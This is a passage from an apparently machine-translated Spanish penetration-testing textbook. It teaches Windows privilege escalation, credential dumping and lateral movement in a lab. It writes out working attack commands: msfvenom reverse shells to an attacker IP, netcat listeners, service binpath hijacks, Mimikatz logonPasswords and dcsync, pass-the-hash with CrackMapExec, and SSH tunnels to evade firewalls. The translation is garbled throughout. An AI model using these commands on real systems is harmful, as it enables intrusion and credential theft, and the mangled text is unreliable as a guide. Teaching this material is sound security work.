"WIN7LAB\admin"... En Kali, usted debe ser un administrador: root@kali:~# ncÿnlvp6666 escuchando en [cualquier] 6666… conectarse a [172.16.0.102] desde (DESCONOCIDO) [172.16.0.101] 49174 Microsoft Windows [Versión 6.1.7601] Copyright(c)2009MicrosoftCorporation.Todoslosderechosreservados. C:\Usuarios\Gus>whoami whoami win7lab\admin PSExecTool La utilidad de línea de comandos de PSExec es similar a ejecutar como ejecutable. Puede obtener una copia de PSExe en la siguiente ubicación: docs.microsoft.com/en-us/sysinternals/downloads/psexec La diferencia entre esta herramienta y runas.exe es que tendrá más opciones y flexibilidad con PS Exec. Un ejemplo sería si ya tiene un shell limitado en el host de Windows de destino. Aquí, encontró las credenciales de la cuenta de administrador (el nombre de usuario es admin y la contraseña es contraseña 123 ). En esta etapa, puede usar MSFvenom para generar un caparazón inverso y luego iniciar su escucha en Kalihost: $msfvenomÿpwindows/x64/shell_reverse_tcpLHOST=172.16.0.102LPORT=1111ÿ fexeÿoshell_reverse.exe Inicie el oyente usando netcat : $ncÿnlvp1111 Cuando volvamos a nuestro símbolo del sistema limitado de Windows, debemos transferir Canal de Telegram : @IRFaraExam Machine Translated by Google el archivo shell_reverse al host de Windows. Después de eso, podemos ejecutarlo con PSExecutility para obtener un shell raíz: C:\herramientas> PsExec64.exe/accepteulaÿiÿuadminÿppassword123C: \herramientas\shell_reverse.exe En esta etapa, debemos obtener un shell de administración en la sesión de escucha de Kali. Explotación de servicios en Windows Los servicios en el sistema Windows son como demonios en el sistema operativo Linux. Ejecutan tareas en segundo plano y, la mayoría de las veces, se ejecutan con privilegios de SISTEMA (lo que nos brinda otra forma de lograr un shell del sistema). Interactuar con los servicios de Windows Tendremos que interactuar con los servicios de Windows a través de la línea de comandos (ya que tenemos un shell limitado). Para hacer el trabajo, nos encontraremos con los siguientes comandos populares: #ToListtheconfigurationofaservice C: \>sc.exeqc[servicename] #Paraeditarlaconfiguracióndeunservicio C: \>sc.execonfig[nombre del servicio][configuración]=[nuevo valor] #ParaPararservicio C: \>sc.exestop[nombreservicio] #ParaIniciarunservicio C: \>sc.exestart[nombreservicio] #Obtenerelestadodeunservicio C: \>sc.exequery[nombre del servicio] Permisos de servicio mal configurados En este escenario, estamos buscando servicios con los permisos incorrectos. En otras palabras, queremos un servicio en el que nosotros (usuarios limitados) tengamos permiso para cambiar su configuración. Estas son las dos configuraciones comunes que deberían permitirnos anular un servicio (permitiéndonos obtener un shell remoto): SERVICIO_CAMBIO_CONFIG SERVICIO_TODO_ACCESO Por lo general, puede usar una herramienta automatizada para encontrar un servicio mal configurado. Más adelante en este capítulo, aprenderá acerca de algunas de las herramientas comunes, pero por el momento, concéntrese en el principio de su funcionalidad. Canal de Telegram : @IRFaraExam Machine Translated by Google Por ejemplo, la herramienta automatizada encontrada en un servicio configurado llamado miss_svc . En su símbolo del sistema, use la utilidad sc.exe para consultar su configuración: C:\Usuarios\LowPrivUser>sc qcmiss_svc [SC]QueryServiceConfigÉXITO NOMBRE_SERVICIO:miss_svc :10WIN32_PROPIO_PROCESO START_TYPE :3DEMAND_START ERROR_CONTROL:1NORMAL ESCRIBE BINARY_PATH_NAME:"C:\ProgramFiles\Services\test_service.exe" LOAD_ORDER_GROUP: ETIQUETA NOMBRE PARA MOSTRAR :0 :MissServicio DEPENDENCIAS: SERVICE_START_NAME:Sistema local Tenga en cuenta las dos configuraciones importantes en los resultados anteriores. La primera opción BINARY_PATH_NAME muestra la ruta al ejecutable del servicio. Más tarde, anularemos esta configuración para ingresar la ruta a nuestro shell inverso. , y su valor es revelar que este servicio se está ejecutando como Cuenta del sistema SERVICE_START_NAME . A continuación, inspeccionaremos los permisos de LowPrivUser para este servicio utilizando la utilidad accesschk.exe : C:\Users\LowPrivUser>accesschk.exe /accepteulaÿuwcqvLowPrivUsermiss_svc RWmiss_svc SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_CHANGE_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS SERVICE_START SERVICE_STOP ¡Impresionante! De acuerdo con la salida anterior, tenemos el permiso para cambiar la configuración del servicio, y además de eso, podemos iniciarlo y detenerlo. Tenga en cuenta que es importante que podamos iniciar y detener el servicio o, de lo contrario, tenemos que esperar a que la máquina se reinicie para que nuestros cambios surtan efecto y obtener el shell inverso (es decir, si el servicio se inicia automáticamente; si es manual, entonces nuestros cambios no tendrán ningún efecto en absoluto). Ahora es el momento de cambiar la configuración del servicio para que apunte a nuestro shell inverso: Canal de Telegram : @IRFaraExam Machine Translated by Google C:\Users\LowPrivUser>scconfigmiss_svcbinpath="\"C: \Users\LowPrivUser\root_shell.exe\"" En esta etapa, puedo iniciar la escucha en mi host Kali. Luego podemos reiniciar el servicio para llamar a nuestro shell inverso (además, obtener un shell del sistema en nuestro host Kali): C:\Users\LowPrivUser>sc stopmiss_svc C:\Users\LowPrivUser>sc startmiss_svc Anulación del ejecutable del servicio En el ejemplo anterior, teníamos los permisos para cambiar la configuración del servicio. Supongamos que no tiene esos permisos ( SERVICE_CHANGE_CONFIG ), pero tiene el permiso para cambiar el ejecutable del servicio. En otras palabras, tiene el permiso de escritura para el propio archivo: C:\Archivos de programa\Servicios\test_service.exe Para verificar los permisos de un archivo, puede usar la utilidad access check.exe : C:\herramientas>accesschk.exe/accepteulaÿquvw"C: \ProgramFiles\Services\test_service.exe" Si ese es el caso (usted tiene los permisos de escritura), también necesita sobrescribir test_service.exe con su shell inverso (debe tener el mismo nombre). Después de copiar el ejecutable de shell inverso, entonces inicie su escucha en Kali y finalmente reinicie el servicio. Ruta de servicio sin comillas Antes de explotar esta falla, debe conocer algunos conceptos básicos de los ejecutables del sistema Windows. En Windows, puede ejecutar archivos .exe de dos maneras diferentes. La primera es usando el nombre completo del ejecutable, por ejemplo: C: \> programa.exe Además, algunos programas aceptarán argumentos adicionales: C:\>ping.exe10.0.0.1 La segunda forma de ejecutar programas es eliminando la extensión .exe si el programa está en la variable PATH de Windows: C:\>ping10.0.0.1 Canal de Telegram : @IRFaraExam Machine Translated by Google En este escenario de ejemplo, no tenemos permiso para cambiar la configuración (a diferencia del caso anterior). Por lo tanto, el objetivo es engañar a la ruta para ir al ejecutable del servicio en nuestro shell inverso. Suponiendo que el administrador guardó el servicio en la siguiente ruta: C:\Archivos de programa\AdminServices\svctest\service.exe el sistema operativo tratará la ruta anterior como cuatro cadenas diferentes debido a los caracteres de espacio: C:\Programa Archivos\Administrador Servicios\servicio prueba\servicio.exe Para este exploit, apuntaremos al servicio llamado usvc : C:\Users\LowPrivUser>scqcusvc [SC]QueryServiceConfigÉXITO NOMBRE_SERVICIO:usvc :10WIN32_PROPIO_PROCESO ESCRIBE START_TYPE ERROR_CONTROL :3DEMAND_START :1NORMAL BINARY_PATH_NAME:"C:\ProgramFiles\AdminServices\svc prueba\servicio.exe" […] A continuación, inspeccionaremos los permisos que tiene el usuario con privilegios bajos en este servicio en particular: C:\Usuarios\LowPrivUser>accesschk.exe /accepteulaÿuwcqvLowPrivUser usvc RWusvc SERVICIO_CONSULTA_ESTADO SERVICIO_QUERY_CONFIG SERVICIO_INTERROGAR SERVICIO_ENUMERAR_DEPENDIENTES SERVICIO_START SERVICIO_PARAR Como puede ver, no tenemos permiso para cambiar las opciones de este servicio, pero tenemos la opción de iniciarlo o detenerlo. Nuestro próximo objetivo es encontrar un directorio grabable para guardar un shell inverso en él. Canal de Telegram : @IRFaraExam Machine Translated by Google C:\herramientas>accesschk.exe/accepteulaÿuwdq"C:\ProgramFiles\AdminServices\" C:\ProgramFiles\AdminServices MediumMandatoryLevel(Predeterminado)[Sin escritura] RWBUILTIN\Usuarios RWNTSERVICE\TrustedInstaller RWNTAUTHORITY\SYSTEM RWBUILTIN\Administradores Todo lo que tenemos que hacer en esta etapa es realizar los siguientes pasos: 1. Copie el shell inverso en la carpeta C:\ProgramFiles\AdminServices\ y llámelo svc.exe porque queremos aprovechar la variable de ruta Services\svc . 2. Comience a escuchar Kali. 3.Reinicieelservicio. 4.Getasystemshell. Permisos de registro débiles A veces, el servicio en sí está bien protegido y muestra que no tiene acceso para cambiar sus configuraciones. El truco es buscar en otras partes, en las entradas del registro del sistema operativo Windows. Tenga en cuenta que el registro de Windows es la base de datos de las configuraciones del sistema Windows (por ejemplo, aplicaciones y servicios). Para este ejemplo, la herramienta automatizada que estamos usando es WinPEAS (obtendrá más información al respecto más adelante en este capítulo). La herramienta encontró que la siguiente entrada de registro es vulnerable: HKLM\Sistema\CurrentControlSet\Servicios\reg_svc A continuación, inspeccionaremos los permisos mediante la herramienta habitual accesscheck.exe : C:\herramientas>accesschk.exe/accepteulaÿ uvwqkHKLM\System\CurrentControlSet\Services\reg_svc […] RWNTAUTHORITY\INTERACTIVO CLAVE_TODO_ACCESO El grupo integrado NTAUTHORITY\INTERACTIVE tiene permisos de lectura y escritura. Este grupo incluye a todos los usuarios que iniciaron sesión en el host físico (es por eso que el Canal de Telegram : @IRFaraExam Machine Translated by Google La herramienta WinPEAS detectó la falla). Ahora que estamos listos para los permisos, inspeccionemos la entrada de registro de esta ruta: C:\herramientas>consulta de registroHKLM \System\CurrentControlSet\Services\reg_svc […] FilePathREG_EXPAND_SZ"C:\Archivos de programa\Servicios\registryservice.exe" DisplayNameREG_SZRegistryService ObjectNameREG_SZLocalSystem En esta etapa, todo lo que tenemos que hacer es anular el servicio de registro. exe mediante un shell inverso : C:\> regaddHKLM\SYSTEM\CurrentControlSet\services\reg_svc/v FilePath/ tREG_EXPAND_SZ/dC:\reverse_shell.exe/f Estamos prácticamente listos para comenzar; los pasos restantes son los siguientes: 1. Inicie la escucha en Kali. 2. Reinicie el servicio mediante la línea de comandos. 3.Getasystemshell. Explotación de las tareas programadas En el capítulo anterior, vio cómo aprovechar los trabajos cron. En el sistema Windows, el cron se llama Tareas programadas. Las tareas pueden ser programadas para que las ejecute el propio usuario (por ejemplo, el administrador), y los usuarios con privilegios elevados también pueden ejecutar tareas para otros usuarios. En general, para aprovechar esta debilidad, deberá seguir estos pasos: 1. Busque manualmente un script sospechoso (probablemente sea un script de PowerShell). 2. Verifique el contenido (probablemente el contenido muestre que es una tarea programada en la sección de comentarios). 3. Verifique sus permisos para ver si puede sobrescribirlo usando el utilidad accesscheck.exe . 4. En caso afirmativo, sobrescriba el contenido con un caparazón inverso. WindowsPrivEscHerramientas automatizadas Canal de Telegram : @IRFaraExam Machine Translated by Google Hay muchas herramientas automatizadas para el sistema de destino de Windows. Cada una tiene sus propias ventajas y desventajas. Ahora que comprende cómo funciona la escalada de privilegios en Windows, echemos un vistazo al conjunto de herramientas de automatización más popular. Encender El script PowerUp.ps1 es una utilidad que pertenece al kit de herramientas de PowerSploit. Este script de PowerShell analizará e identificará cualquier configuración que falte en el sistema Windows. Para descargar el script, puede obtenerlo de GitHub: github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 Antes de ejecutar el script, debe comprender alguna información básica acerca de cómo ejecutar los scripts de PowerShell. Para ejecutar el código de PowerShell, deberá usar PowerShell, ¿verdad? ¿Qué sucede si tiene un shell limitado que usa un símbolo del sistema? En el símbolo del sistema, puede anteponer la palabra clave powershell antes de ejecutar el código . C:\>powershellC:\herramientas\prueba.ps1 Además, tenga en cuenta que tendrá que cambiar la política de ejecución en PowerShell a Sin restricciones antes de ejecutar el script de PowerUp . De manera predeterminada, Microsoft habilita esta función para proteger a los usuarios de los scripts maliciosos de PowerShell: C: \> powershellSet-ExecutionPolicy-ScopeCurrentUserExecutionPolicyUnrestricted-Force Ahora podemos comenzar a ejecutar el script PowerUp . Primero, vamos a cargarlo usando el siguiente comando: C:\herramientas>powershell..\PowerUp.ps1 Luego, para ejecutarlo, cargue la función Invoke-AllChecks : C:\herramientas>powershellInvoke-AllChecks WinPEAS Escalada de privilegios de WindowsAwesomeScriptesunagranherramientaparalaescaladadeprivilegiosdeWindows. github.com/carlospolop/privilege-escalation-awesome-scripts Canal de Telegram : @IRFaraExam Machine Translated by Google suite/árbol/maestro/winPEAS Tenga en cuenta que ya tiene una versión compilada ( archivo .exe ). Para descargar el archivo .exe de 64 bits , use el siguiente enlace: github.com/carlospolop/privilege-escalation-awesome-scripts suite/tree/master/ winPEAS/winPEASexe/winPEAS/bin/x64/Release A continuación, antes de ejecutar la herramienta WinPEAS, puede agregar una entrada de registro usando su línea de comando para agregar colores a la salida de WinPEAS: C:\>regaddHKCU\Console/vVirtualTerminalLevel/tREG_DWORD/d1 Después de ejecutar el comando de entrada de registro anterior, debe cerrar la sesión de Windows y volver a abrir un nuevo símbolo del sistema. En esta etapa, está listo para ejecutarlo. En el siguiente paso, informará a la herramienta para ejecutar todas las comprobaciones rápidamente y al mismo tiempo: C:\>winpeas.exequietcmdfast Resumen Este fue un capítulo largo y complicado. No se dé por vencido si le resultó difícil entenderlo; simplemente siga intentándolo una y otra vez. El aprendizaje se trata de practicar los conceptos básicos repetidamente . Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 12 PivotaciónyMovimientoLateral Una práctica común en el movimiento lateral es buscar contraseñas almacenadas y hashes después de establecer acceso remoto al host de la víctima. El acceso remoto puede ser un shell limitado, una sesión de escritorio remoto o, mejor aún, un shell de raíz/administrador. Dicho esto, si está conectado con un usuario con pocos privilegios, entonces su probabilidad de éxito será muy baja. ¿Por qué ? Los profesionales en el campo usan los términos pivote y movimiento lateral indistintamente. En este capítulo, usaremos los dos términos para hablar sobre el mismo principio. En este capítulo, obtendrá información sobre los siguientes temas para que pueda pasar de un host a otro con facilidad: Descripción de los hashes de contraseña de Windows DumpingWindowspasswordhashes Aprender sobre pasar el hachís Conceptos de reenvío de puertos Reenvío de puerto local Reenvío de puerto remoto Reenvío dinámico de puertos DumpingWindowsHashes En esta sección, aprenderá a extraer contraseñas hash de un host de Windows. Canal de Telegram : @IRFaraExam Machine Translated by Google problemas técnicos (por lo que usarán sus credenciales en el host donde desean ejecutar su trabajo). Además, tenga en cuenta que las personas tienden a reutilizar sus contraseñas para diferentes tipos de cuentas. PROPINA El capítulo 1, “Dominio de la ventana de terminal”, ya cubrió cómo un sistema Linux almacena contraseñas. Recuerde que la ubicación de las contraseñas hash de Linux es /etc/shadow. WindowsNTLMHashes Las versiones anteriores de los sistemas operativos Windows se usaban para almacenar contraseñas en formato de hash de LAN Manager (LM). Los hashes de LM eran fáciles de descifrar debido a los siguientes criterios principales: Una contraseña está limitada a un máximo de 14 caracteres. Una contraseña no distingue entre mayúsculas y minúsculas. Si una contraseña tiene 14 caracteres, se fragmenta en dos fragmentos de siete caracteres, lo que facilita su descifrado porque puede atacar cada uno por separado. Si una contraseña tiene menos de siete caracteres, solo los primeros siete caracteres se codificarán y la otra cadena de caracteres se establecerá en un valor constante 0xAAD3B435B51404EE. Tenga cuidado con el historial de hash de credenciales de Windows. De hecho, los hashes de LM se utilizaron en lo siguiente: WindowsNT3.1 WindowsNT3.5 WindowsNT3.51 WindowsNT4 Windows95 Canal de Telegram : @IRFaraExam Machine Translated by Google Windows98 Windows2000 Windows Me Por lo tanto, el LM ya no se usa en los sistemas operativos modernos. A partir de Windows Vista y Windows Server 2008, Microsoft deshabilitó el LM hash de forma predeterminada. Pero la función se puede habilitar para cuentas locales y cuentas de Active Directory a través de una configuración de política de seguridad. En la actualidad, el sistema operativo Windows utiliza NTLanManager (NTLM) v2. Verá el aspecto de este hash en la siguiente sección, pero sepa que es una mejora de LM y NTLMv1. Este hash se introdujo en Windows NT4 SP4 y es compatible de forma nativa con los sistemas Windows. Extraer los hash (volcar el hash) Descifrar los hash o reutilizarlos (pasar el hash) Archivo SAMFy volcado de hash El archivo Security Account Manager (SAM) es donde el sistema Windows almacenará los hashes de cuenta. Este archivo está ubicado en %SystemRoot%/system32/config/SAM y está montado en HKLM/SAM. Desafortunadamente, no tiene acceso de lectura a este archivo (incluso si es administrador). Por suerte para los hackers, tenemos herramientas para extraer (volcar) esos hashes. Pwdump es una gran herramienta para hacer el trabajo. Para descargar la versión 8 de Pwdump, vaya a la siguiente ubicación (la última versión compatible con Windows 10): http://blackmath.it/pub/pwdump/pwdump8.exe C:\Usuarios\admin\Documentos>pwdump8.exe PwDumpv8.2-dumpswindowspasswordhashes-byFulvioZanetti&AndreaPetralia@http:// www.blackMath.it Administrador:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C Invitado:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 Canal de Telegram : @IRFaraExam Machine Translated by Google Cuenta predeterminada: 503: AAD3B435B51404EEAAD3B435B51404EE: 31D6CFE0D16AE931B73C59D7E0 administrador:1001:AAD3B435B51404EEAAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634 De acuerdo con la salida anterior, el formato de cada cuenta es el siguiente: [nombre de usuario]:[ID de usuario]:[AAD3B435…404EE]:[NTLMHashValue] Hay dos lecciones esenciales para comprender este formato de archivo ( SAM ) . usando el hash Después de extraer el hash, tendrá dos opciones: Úselo para iniciar sesión en otros sistemas Windows (pasar el hash) Crackear el hash para obtener la contraseña de texto claro (mi opción efectiva favorita) En las próximas secciones (sobre la reutilización de contraseñas y hashes), aprenderá a utilizar el hash extraído para iniciar sesión de forma remota en otro host de Windows. Mimikatz Mimikatz es una navaja suiza que puede extraer lo siguiente de la memoria: Windows ha perdido las contraseñas. contraseñas de texto sin formato. Kerberostickets. Este ticket lo utilizan principalmente los sistemas Windows para el inicio de sesión único. El SSO permite a un usuario utilizar sus credenciales de dominio en otros sistemas sin volver a introducir su contraseña. Puede obtener Mimikatz de dos maneras. Puede descargarlo del repositorio de GitHub desde github.com/gentilkiwi/ mimikatz o puede copiar Mimikatz del sistema de archivos KaliLinux al sistema operativo Windows. Los archivos binarios se encuentran en las siguientes rutas (versiones de 32 y 64 bits): /usr/share/windowsÿresources/mimikatz/Win32/mimikatz.exe Canal de Telegram : @IRFaraExam Machine Translated by Google /usr/share/windowsÿresources/mimikatz/x64/mimikatz.exe Después de copiar la versión de 64 bits del host Windows 10 de Mimikatztomy, abra el símbolo del sistema en modo administrador. A continuación, ejecutaré Mimikatz al invocarlo: C:\Usuarios\admin\Documentos>mimikatz.exe #####.mimikatz2.2.0 (x64)#19041May19202000: 48: 59 ##^##. "ALaVie, AL'Amour"-(oe.eo) ##/\##/***BenjaminDELPY`gentilkiwi`(benjamin@gentilkiwi.com) ##\/##>http://blog.gentilkiwi.com/mimikatz '##v##'VincentLETOUX(vincent.letoux@gmail.com) '#####'>http://pingcastle.com/http://mysmartlogon.com***/ Ahora que Mimikatz está cargado, puede comprobar si sus privilegios le permitirán usted puede volcar los hashes ejecutando el privilegio:: comando de depuración : mimikatz#privilegio :: depuración Privilegio'20'OK La palabra OK significa que estamos listos para continuar con la extracción. A continuación, ejecutemos el comando sekurlsa::logonPasswordsfull : mimikatz#sekurlsa :: logonPasswordsfull ID de autenticación Sesión :0;1297963(00000000:0013ce2b) :Interactivodesde1 Nombre de usuario :administración Dominio :WINDOWS10LAB02 :WINDOWS10LAB02 :10/8/20204:58:22AM :S-1-5-21-1416285162-3336877196- Servidor de inicio de sesión Hora de inicio de sesión SID673110829-1001 msv: [00000003]primario * Nombre de usuario: administrador *Dominio:WINDOWS10LAB02 * NTLM:209c6174da490caeb422f3fa5a7ae634 * SHA1:7c87541fd3f3ef5016e12d411900c87a6046a8e8 [00010000]Claves de credenciales * NTLM:209c6174da490caeb422f3fa5a7ae634 * SHA1:7c87541fd3f3ef5016e12d411900c87a6046a8e8 cucharadita: resumen: * Nombre de usuario: administrador Canal de Telegram : @IRFaraExam Machine Translated by Google *Dominio:WINDOWS10LAB02 *Contraseña:(null) kerberos: * Nombre de usuario: administrador *Dominio:WINDOWS10LAB02 *Contraseña:(null) […] DumpingActiveDirectoryHashes En una organización típica, las personas usan su cuenta de Active Directory para iniciar sesión en su host. Usan la misma cuenta para iniciar sesión en otros sistemas (por ejemplo, sitio de intranet, unidades compartidas, CRM, etc.), y esto se denomina inicio de sesión único ( SSO) . El mismo concepto se aplica a este archivo. No podrá . tiene que volcarleerlo, los usuarios y sus contraseñas hash. Para hacer el trabajo , usemos Mimikatz nuevamente. mimikatz#lsadump::dcsync/domain:kcorp.local/all/csv [DC]'kcorp.local'willbethedomain [DC]'AD-Server.KCorp.local'willbetheDCserver [DC]Exportingdomain'kcorp.local' 502krbtgt500Administrator770110686894194cf353a12f79d8f62510660LAB4$ bae1d71f7002fb3ae9cc3fe6864b3f1c514 e8ea5203b1731110043a546965fc8bab4128 1107WINDOWS10LAB02$c052ace3d5f8e7caed30333c4ab6fb334128 1001ADSERVER$1109elliot 1b48fd53a201df94ef837c66284bde77532480 9f3ddc3df594df2978f57b65f9a53b5266048 Tenga en cuenta que puede ejecutar este comando Mimikatz en cualquier host unido al dominio con privilegios administrativos (no necesita estar físicamente en el servidor DC). Reutilización de contraseñas y hashes ¿Qué pasaría si alguien le dijera que existe una herramienta que escanea toda la red y prueba las credenciales (contraseñas de texto claro y contraseñas cifradas) en cada máquina? Asombroso, ¿verdad? Esta herramienta se llama CrackMapExec, ¡y automatiza esta tarea como un campeón ! . Canal de Telegram : @IRFaraExam Machine Translated by Google Primero, analicemos la red en busca de hosts en vivo que admitan SMBusing CrackMapExec. Tenga en cuenta que esta herramienta está preinstalada en KaliLinux: root@kali:~#crackmapexecsmb172.16.0.0/24 SMB172.16.0.2445AD-SERVER[*]Windows10.0Build17763x64(nombre:AD-SERVER) (dominio:KCORP)(firma:Verdadero)(SMBv1:Falso) SMB172.16.0.106445WINDOWS10LAB02[*]Windows10Pro10240x64(nombre:WINDOWS10LAB02) (dominio:KCORP)(firma:falso)(SMBv1:verdadero) SMB172.16.0.104445WINDOWS10LAB[*]Windows10.0Build17763x64(nombre:WINDOWS10LAB) (dominio:KCORP)(firma:falso)(SMBv1:falso) PROPINA Para escanear hosts Linux, debe usar la opción de escaneo de servicios SSH. raíz@kali:~#crackmapexecssh172.16.0.0/24 SSH172.16.0.107222.0172.16.0.107 OpenSSH_8.2p1Ubuntu-4ubuntu0.1 [*] SSH La herramienta ha encontrado tres hosts de Windows. A continuación, probaremos las cuentas locales en cada host con nombre de usuario = admin y contraseña = admin : root@kali:~#crackmaexecsmb172.16.0.0/24-uadmin-padmin-autorización local SMB172.16.0.2445AD[*]Windows10.0Build17763 SERVERx64(nombre:AD-SERVER)(dominio:AD-SERVER)(firma:Verdadero) (SMBv1: falso) SMB172.16.0.2445AD[-]AD-SERVIDOR\admin:admin SERVERSTATUS_LOGON_FAILURESMB172.16.0.106445WINDOWS10LAB02[*]Windows10Pro10240x64(no (SMBv1: Verdadero) SMB172.16.0.104445WINDOWS10LAB[*]Windows10.0Build17763x64(nombre:WINDOWS10LAB) (dominio:WINDOWS10LAB)(firma:falso) (SMBv1: falso) SMB172.16.0.106445WINDOWS10LAB02[+]WINDOWS10LAB02\admin:adminSMB172.16.0.104445WINDOW De acuerdo con los resultados de salida, el puede ver que las credenciales funcionaron en el host172.16.0.106. Además, puede usar el mismo concepto si pudiera descargue los hashes y obtenga una contraseña de texto sin cifrar (si pudo descifrarlo). en el capítulo siguiente, verá cómo descifrar hashes NTLM volcados. Canal de Telegram : @IRFaraExam Machine Translated by Google pasa el hash Pasar el hash (PTH) es simplemente usar el valor hash en lugar del texto claro contraseña para iniciar sesión en el host remoto. Seleccionaremos a elliot de la salida de Mimikatz cuando usamos la edición para volcar las cuentas del servidor DC. usaremosCrackMapExecasbien: root@kali:~#crackmapexecsmb172.16.0.0/24-williotH'9f3ddc3df594df2978f57b65f9a53b52' SMB172.16.0.2445AD-SERVER[*]Windows10.0Build17763x64(nombre:AD-SERVER) (dominio:KCORP)(firma:Verdadero)(SMBv1:Falso) [+]KCORP\elliotSMB172.16.0.2445ADSERVER9f3ddc3df594df2978f57b65f9a53b52(Pwn3d!) SMB172.16.0.106445WINDOWS10LAB02[*]Windows10Pro10240x64(nombre:WINDOWS10LAB02) (dominio:KCORP)(firma:falso)(SMBv1:verdadero) SMB172.16.0.104445WINDOWS10LAB[*]Windows10.0Build17763x64(nombre:WINDOWS10LAB) (dominio:KCORP)(firma:Falso) (SMBv1: falso) SMB172.16.0.106445WINDOWS10LAB02[+]KCORP\elliot9f3ddc3df594df2978f57b65f9a53b52SMB172.16. ¡Mire esto! La cuenta de elliot se probó con éxito (cuando el signo más aparece) en tres hosts de Windows. PROPINA CrackMapExec puede usarse para otros fines y no solo para credenciales de automatización de fuerza bruta. Aquí hay algunas facciones que puede ejecutar con esta herramienta: Enumerateshares Enumerateactivesessions Enumerar usuarios registrados Usuarios de dominio enumerados Enumeratelocal/domaingroups Y mucho más Canal de Telegram : @IRFaraExam Machine Translated by Google Rotación con redirección de puertos Este puede ser un concepto confuso para los principiantes en el campo, pero como es habitual, esta sección intentará simplificarlo para que pueda usarlo en su extremo. (La mejor manera de entender esta sección es practicarlo; no solo leerlo). Conceptos de reenvío de puertos Reenvío de puerto local Reenvío de puerto remoto Reenvío dinámico de puertos Conceptos de reenvío de puertos El reenvío de puertos (o redirección) es simplemente redirigir la comunicación de red debido a una restricción de firewall. Elliot, un empleado de ECorp, quiere conectarse a su servidor FTP en ftp.fsociety.com, pero los firewalls de ECorp restringen las conexiones salientes a través del puerto 21 (el puerto predeterminado de FTP). Por otro lado, ECorp permite la comunicación saliente en los puertos 80 y 443 (HTTP/HTTPS) . que redirige las comunicaciones del puerto 80 al 21 y las envía al servidor de destino FTP. Inteligente, ¿verdad? La figura 12.1 muestra cómo se ve visualmente. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 12.1 Reenvío de puertos En este escenario, tenemos las siguientes direcciones IP públicas (las direcciones IP son falsas; son solo por el bien de este ejemplo): ElliotECorpIP: 1.1.1.1 redirección.fsociety.com: 2.2.2.2 ftp.fsociety.com: 3.3.3.3 Elliot ya ha instalado rinetd en LinuxVM (redirect.fsociety.com) usando el comando aptinstall : $aptinstallrinetd Una vez instalada la aplicación rinetd , deberá configurarla para redirigir la conexión de red . . Una vez que se abre el archivo, Elliot debe seguir las BindAddress|BindPort|ConnectAddress|ConnectPort Por lo tanto, hará los siguientes cambios: 1.1.1.1803.3.3.321 La dirección de enlace es la dirección IP de donde proviene la conexión y la dirección de conexión es el destino del servidor FTP. Para aplicar los resultados, Elliot guardará el archivo y reiniciará el servicio mediante el siguiente comando: $servicerinetdrestart En esta etapa, Elliot usará el siguiente comando ftp para evitar el firewall (Ellio está usando una máquina virtual KaliLinux en su computadora portátil): $ftp2.2.2.2:80 Túnel de SSHT y reenvío de puerto local En el ejemplo anterior, vio los conceptos básicos del reenvío de puertos. Canal de Telegram : @IRFaraExam Machine Translated by Google realice una redirección de puerto local mediante SSH. Para seguir el ejemplo anterior, esto es lo que parece en cada lado: ElliotECorp: PublicIP1.1.1.1 Elliot usará el comando de cliente SSH (para el reenvío de puerto local) antes de intentar usar la conexión FTP. redirección.fsociety.com (puerta): IP pública2.2.2.2 El servidor SSH estará atento a las conexiones entrantes. ftp.fsociety.com (servidor FTP): PublicIP3.3.3.3 Servidor FTP instalado para FSociety En el paso 1, Elliot necesita ejecutar un servidor SSH en su VM de puerta de enlace (redirect.fsociety.com). En el paso 2, Elliot ejecutará el cliente SSH en su Kali VM (dentro de ECorp) para escuchar localmente en el puerto 4444 y enviar el tráfico al SSH servidor: root@kali:~#ssh-L4444:3.3.3.3:212.2.2.2 Para el paso final, Elliot puede conectarse a su servidor FTP mediante el escucha del puerto del host local : raíz@kali:~#ftp127.0.0.1:4444 Si ECorp no permite la conexión SSH (puerto 22) en sus reglas de firewall salientes, entonces Elliot debe hacer un truco. Primero, debe cambiar el puerto de escucha SSH en redirect.fsociety.com (2.2.2.2) andassignittotheappropriatecustomport number.Let'sassumethattheECorpfirewallallowsonlyoutgoingports80and 443andblocksport22.Inthiscase, Elliothastochangetherouterport forwardingon2.2.2.2toroutetrafficfromport80toport22.Thisisgenerally accomplishedintherouteradminpanel.Eachroutershouldhavetheport forwardingfunctionality.Second, hemustusethefollowingcommandonhis KaliLinuxVM (1.1.1.1): raíz@kali:~#ssh-p80-L4444:3.3.3.3:212.2.2.2 Canal de Telegram : @IRFaraExam Machine Translated by Google Reenvío de puertos remotos mediante SSH Let'stakethechallengealittlebitfurtherandtrytocompleteanothertaskusing portforwarding.Elliot, duringhispentestsatECorp, gotalimitedshelltothe productionserver.Next, herealizedthatthisserverhasMySQLlisteningatport 3306.ElliottriedtousehisrestrictedshelltoconnecttotheMySQLserver, pero hisshelldidn'tallowhimto.Thebestwaytotacklethischallengeisbyusingthe remoteportforwardingtechniquetoexposetheMySQLportandbeingableto accessitremotely. (Ver Figure12.2). Figura 12.2 Diagrama de red ECorp ElliotKaliVM: Dirección IP: 172.16.1.55 ServidorProdExplotado ( prod1.ecorp.local ) Dirección IP: 10.10.1.114 Puertos abiertos: 22 (SSH), 443 (TLS) En el primer paso, Elliot tiene que ejecutar el servidor SSH en su máquina virtual Kali. Luego, usando su shell limitado, ejecutará el siguiente comando para exponer el puerto MySQL (Elliot puede usar la opción ÿp para especificar un puerto personalizado en caso de que el firewall PROD Canal de Telegram : @IRFaraExam Machine Translated by Google está bloqueando la conexión): $ssh-R443:127.0.0.1:3306root@172.16.1.55 Ahora que se completó el túnel, Elliot puede conectarse desde su Kali VM directamente al servidor explotado (10.10.1.114). Tenga en cuenta que Elliot ya obtuvo las credenciales (durante sus pruebas de penetración) para conectarse a este servidor MySQL. Elliot eligió cuidadosamente el puerto 443 ya que el servidor comprometido está permitiendo conexiones entrantes a él: root@kali:~#mysql--usuario=raíz--contraseña--host=127.0.0.1-- puerto=443 DynamicPortForwarding Nowit'stimeforthebestpartofthischapter.Inthisscenario, Elliothasalready 